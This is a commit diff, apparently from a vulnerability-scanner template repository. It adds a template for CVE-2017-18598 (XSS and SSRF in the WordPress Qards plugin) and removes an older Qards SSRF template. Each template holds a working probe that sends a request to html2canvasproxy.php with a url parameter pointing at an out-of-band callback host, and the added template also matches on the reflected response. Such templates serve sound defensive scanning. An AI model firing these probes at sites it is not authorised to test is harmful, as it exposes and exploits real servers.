misc updates
parent
c8984f9266
commit
fd7ac70096
|
@ -0,0 +1,29 @@
|
|||
id: CVE-2017-18598
|
||||
|
||||
info:
|
||||
name: Qards Plugin - Stored XSS and SSRF
|
||||
author: pussycat0x
|
||||
severity: medium
|
||||
description: The Qards plugin through 2017-10-11 for WordPress has XSS via a remote document specified in the url parameter to html2canvasproxy.php
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/8934
|
||||
- https://wpscan.com/vulnerability/454a0ce3-ecfe-47fc-a282-5caa51370645
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2017-18598
|
||||
tags: cve,cve2017,wordpress,ssrf,xss,wp-plugin,oast
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/qards/html2canvasproxy.php?url=https://{{interactsh-url}}'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol
|
||||
words:
|
||||
- "http"
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "console.log"
|
|
@ -1,17 +0,0 @@
|
|||
id: qards-ssrf
|
||||
info:
|
||||
name: Qards - Server Side Request Forgery
|
||||
author: pussycat0x
|
||||
severity: medium
|
||||
description: Qards provides you easy option to drag and edit every part and element of your site in the front-end, you will never have to write any code to change the layout or to change any part of the site like the traditional WordPress way.
|
||||
reference: https://wpscan.com/vulnerability/454a0ce3-ecfe-47fc-a282-5caa51370645
|
||||
tags: wordpress,ssrf
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/qards/html2canvasproxy.php?url=https://{{interactsh-url}}/'
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol
|
||||
words:
|
||||
- "http"
|
Loading…
Reference in New Issue